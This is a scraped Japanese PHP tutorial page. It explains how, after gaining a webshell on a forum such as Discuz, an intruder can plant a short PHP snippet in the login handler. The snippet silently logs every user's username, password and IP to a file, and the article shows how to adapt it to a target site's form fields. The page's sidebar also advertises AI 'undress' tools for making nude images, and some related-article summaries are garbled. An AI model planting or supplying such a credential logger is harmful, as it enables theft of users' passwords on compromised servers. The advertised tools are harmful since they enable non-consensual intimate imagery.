検索
ホームページバックエンド開発PHPチュートリアルPHP バックグラウンド ログイン パスワードをインターセプトするコード_PHP チュートリアル

PHP バックグラウンド ログイン パスワードをインターセプトするコード_PHP チュートリアル

WBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWB
WBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWB
Jul 13, 2016 pm 05:43 PM
discuzphpwebshellコードバックステージパスワードインターセプトログインさらに遠く

Webシェルを取得した後、さらに侵入したい場合、discuzなどのパスワードはmd5で直接暗号化されていないため、解読するのは非常に困難です。以前ビッグ塔用に一度書いたのですが、昨日たまたまピギー兄さんが使っていたので再度書きました。コードは比較的単純で、ほんの数文です。原理を詳しく説明しますので、PHP についてあまり知らない友人にも安心してご利用いただけます。

if($_POST[loginsubmit]!=){ //ログインボタンがクリックされたかどうかを判定します
$sb=user:.$_POST[ユーザー名].--passwd:.$_POST[パスワード].--ip:.$HTTP_SERVER_VARS[REMOTE_ADDR].--.date(Y-m-d H:i:s).rn; // POSTで受け取った値を連結して変数$sbに代入します
fwrite(fopen(robot.txt,ab),$sb);} //結果をファイルに書き込みます
以下は、Huaxia のログインページを例にした簡単な分析です。 bbs.xxx.com/login.php を開き、右クリックしてソース コードを表示し、CTRL+F 検索アクションでログイン フォームを見つけます。
キーコードをコピーしただけです。
// アクションの後の値は、ログインを処理するフォーム送信のアドレスです。パスワードが正しいかどうかを判断するのは POST なので、$_POST を使用して受信します。
。 。 。 。強力な省略記号。 。 。 。 。 。
アカウント(U):
class=input id=pwuser accessKey=u size=16
name=pwuser>
//ユーザー名の入力ボックス、$_POST[username] に対応する必要があるため、Huaxia のパスワードを傍受するには変更が必要です$_POST[pwuser] へ
パスワード (P):
class=input id=pwpwd accessKey=p
type=password size=16 name=pwpwd>
//ユーザー名の入力ボックス。$_POST[username] に対応する必要があるので、 Huaxia のパスワードを傍受するには、$_POST[pwpwd] に変更する必要があります

www.bkjia.comtru​​ehttp://www.bkjia.com/PHPjc/478807.html技術記事 WebShell を取得した後、さらに侵入したい場合、discuz などのパスワードは md5 で直接暗号化されていないため、解読するのは非常に困難です。以前一度ダトウの執筆を手伝ったのですが、昨日たまたまピギー兄弟がそれを使用しました...
声明
この記事の内容はネチズンが自主的に寄稿したものであり、著作権は原著者に帰属します。このサイトは、それに相当する法的責任を負いません。盗作または侵害の疑いのあるコンテンツを見つけた場合は、admin@php.cn までご連絡ください。
関連記事
絶対的なセッションタイムアウトとアイドルセッションのタイムアウトの違いは何ですか?絶対的なセッションタイムアウトとアイドルセッションのタイムアウトの違いは何ですか?May 03, 2025 am 12:21 AM

絶対セッションのタイムアウトはセッションの作成時に開始され、アイドルセッションタイムアウトはユーザーの操作なしに開始されます。絶対セッションタイムアウトは、金融アプリケーションなど、セッションライフサイクルの厳格な制御が必要なシナリオに適しています。アイドルセッションタイムアウトは、ソーシャルメディアなど、ユーザーが長い間セッションをアクティブに保つことを望んでいるアプリケーションに適しています。

セッションがサーバーで機能していない場合、どのような措置を講じますか?セッションがサーバーで機能していない場合、どのような措置を講じますか?May 03, 2025 am 12:19 AM

サーバーセッションの障害は、手順に従って解決できます。1。セッションが正しく設定されていることを確認するために、サーバーの構成を確認します。 2.クライアントCookieを確認し、ブラウザがそれをサポートしていることを確認し、正しく送信します。 3. Redisなどのセッションストレージサービスを確認して、それらが正常に動作していることを確認します。 4.アプリケーションコードを確認して、正しいセッションロジックを確認します。これらの手順を通じて、会話の問題を効果的に診断および修復し、ユーザーエクスペリエンスを改善することができます。

session_start()関数の重要性は何ですか?session_start()関数の重要性は何ですか?May 03, 2025 am 12:18 AM

session_start()iscrucialinphpformangingusersions.1)itInitiateSanewsessionifnoneExists、2)resumesanexistingsession、および3)SetSessionCookieforcontinuityAcrossRequests、ApplicationslicationSliviseSlikeUserauthicationAnticatent。

セッションクッキーにHTTPonlyフラグを設定することの重要性は何ですか?セッションクッキーにHTTPonlyフラグを設定することの重要性は何ですか?May 03, 2025 am 12:10 AM

HTTPonlyフラグを設定することは、XSS攻撃を効果的に防止し、ユーザーセッション情報を保護することができるため、セッションCookieにとって重要です。具体的には、1)HTTPONLYフラグは、JavaScriptがCookieにアクセスするのを防ぎます。2)Flagは、PHPとFlaskのSetCookiesとMake_Responseを介して設定できます。

PHPセッションはWeb開発でどのような問題を解決しますか?PHPセッションはWeb開発でどのような問題を解決しますか?May 03, 2025 am 12:02 AM

phpsessionssolvetheprobrof of maintainsea crossmultiplehttprequestsbyStoringdataontaonsociatingitiTauniquesessionid.1)それらは、通常はヨーロッパの側面、および一般的には、測定されている

どのデータをPHPセッションに保存できますか?どのデータをPHPセッションに保存できますか?May 02, 2025 am 12:17 AM

phpssionscanStorestrings、numbers、arrays、andobjects.1.strings:textdatalikeusernames.2.numbers:integersorfloatsforcounters.3.arrays:listslikeshoppingcarts.4.objects:complextructuresthataresialized。

どのようにPHPセッションを開始しますか?どのようにPHPセッションを開始しますか?May 02, 2025 am 12:16 AM

tostartaphpsession、outsession_start()atthescript'sbeginning.1)placeitbe foreanyouttosetthesscookie.2)usesionsionsionsionserdatalikelogintatussorshoppingcarts.3)再生セッションインドストップレベントフィックスアタック

セッションの再生とは何ですか?また、セキュリティをどのように改善しますか?セッションの再生とは何ですか?また、セキュリティをどのように改善しますか?May 02, 2025 am 12:15 AM

セッション再生とは、新しいセッションIDを生成し、セッション固定攻撃の場合にユーザーが機密操作を実行するときに古いIDを無効にすることを指します。実装の手順には次のものが含まれます。1。感度操作を検出、2。新しいセッションIDを生成する、3。古いセッションIDを破壊し、4。ユーザー側のセッション情報を更新します。

See all articles

ホットAIツール

Undresser.AI Undress

Undresser.AI Undress

リアルなヌード写真を作成する AI 搭載アプリ

AI Clothes Remover

AI Clothes Remover

写真から衣服を削除するオンライン AI ツール。

Undress AI Tool

Undress AI Tool

脱衣画像を無料で

Clothoff.io

Clothoff.io

AI衣類リムーバー

Video Face Swap

Video Face Swap

完全無料の AI 顔交換ツールを使用して、あらゆるビデオの顔を簡単に交換できます。

もっと見る

人気の記事

Windows11 KB5054979の新しいものと更新の問題を修正する方法
4週間前ByDDD
KB5055523を修正する方法Windows 11にインストールできませんか?
3週間前ByDDD
KB5055518を修正する方法Windows 10にインストールできませんか?
3週間前ByDDD
R.E.P.O.のすべての敵とモンスターの強度レベル
3週間前By尊渡假赌尊渡假赌尊渡假赌
ブループリンス:地下室への行き方
3週間前ByDDD
もっと見る

ホットツール

SublimeText3 中国語版

SublimeText3 中国語版

中国語版、とても使いやすい

MantisBT

MantisBT

Mantis は、製品の欠陥追跡を支援するために設計された、導入が簡単な Web ベースの欠陥追跡ツールです。 PHP、MySQL、Web サーバーが必要です。デモおよびホスティング サービスをチェックしてください。

MinGW - Minimalist GNU for Windows

MinGW - Minimalist GNU for Windows

このプロジェクトは osdn.net/projects/mingw に移行中です。引き続きそこでフォローしていただけます。 MinGW: GNU Compiler Collection (GCC) のネイティブ Windows ポートであり、ネイティブ Windows アプリケーションを構築するための自由に配布可能なインポート ライブラリとヘッダー ファイルであり、C99 機能をサポートする MSVC ランタイムの拡張機能が含まれています。すべての MinGW ソフトウェアは 64 ビット Windows プラットフォームで実行できます。

mPDF

mPDF

mPDF は、UTF-8 でエンコードされた HTML から PDF ファイルを生成できる PHP ライブラリです。オリジナルの作者である Ian Back は、Web サイトから「オンザフライ」で PDF ファイルを出力し、さまざまな言語を処理するために mPDF を作成しました。 HTML2FPDF などのオリジナルのスクリプトよりも遅く、Unicode フォントを使用すると生成されるファイルが大きくなりますが、CSS スタイルなどをサポートし、多くの機能強化が施されています。 RTL (アラビア語とヘブライ語) や CJK (中国語、日本語、韓国語) を含むほぼすべての言語をサポートします。ネストされたブロックレベル要素 (P、DIV など) をサポートします。

AtomエディタMac版ダウンロード

AtomエディタMac版ダウンロード

最も人気のあるオープンソースエディター

もっと見る

ホットトピック

Gmailメールのログイン入り口はどこですか?
7935
15
Java チュートリアル
1652
14
CakePHP チュートリアル
1412
52
Laravel チュートリアル
1303
25
PHP チュートリアル
1250
29
もっと見る